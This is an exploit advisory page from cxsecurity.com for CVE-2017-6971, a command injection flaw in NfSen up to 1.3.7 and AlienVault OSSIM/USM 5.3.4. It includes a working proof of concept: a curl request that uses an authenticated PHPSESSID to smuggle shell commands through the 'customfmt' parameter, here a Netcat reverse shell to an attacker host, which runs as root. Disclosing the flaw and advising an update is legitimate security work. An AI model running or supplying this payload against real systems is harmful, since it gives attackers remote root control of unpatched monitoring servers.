NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection

2017.07.11
Credit: Paul Taylor
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


Ogólna skala CVSS: 9/10
Znaczenie: 10/10
Łatwość wykorzystania: 8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Jednorazowa
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

# Exploit Title: NfSen/AlienVault remote root exploit (IPC query command injection) # Version: NfSen 1.3.6p1, 1.3.7 and 1.3.7-1~bpo80+1_all. Previous versions are also likely to be affected. # Version: AlienVault 5.3.4 # Date: 2017-07-10 # Vendor Homepage: http://nfsen.sourceforge.net/ # Vendor Homepage: http://www.alienvault.com/ # Software Link: https://sourceforge.net/projects/nfsen/files/stable/nfsen-1.3.7/nfsen-1.3.7.tar.gz/download # Exploit Author: Paul Taylor / Foregenix Ltd # Website: http://www.foregenix.com/blog # Tested on: AlienVault USM 5.3.4 # CVE: CVE-2017-6971 1. Description A remote authenticated attacker (or an attacker with a stolen PHP Session ID) can gain complete control over the system by sending a crafted request containing control characters and shell commands which will be executed as root on a vulnerable system. 2. Proof of Concept # From a linux bash prompt on the attacker's machine: # Set target IP targetip='10.100.1.1' # Set desired command to inject (in this case a reverse shell, using Netcat which is conveniently available on an AlienVault USM All-In-One): cmd='nc -ne /bin/bash 10.100.1.2 443'; # Set the PHPSESSID of an authenticated session which has *already* submitted at least one valid NfSen query for processing via the Web UI. PHPSESSID='offq09ckq66fqtvdd0vsuhk5c7'; # Next use curl to send the exploit curl -o /dev/null -s -k -b "PHPSESSID=$PHPSESSID" -d "process=Process&output=custom+...&customfmt=%0A.%0Arun-nfdump%0Aargs=-h; $cmd #" https://$targetip/ossim/nfsen/nfsen.php 3. Solution: Update to latest version of NfSen/USM/OSSIM


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top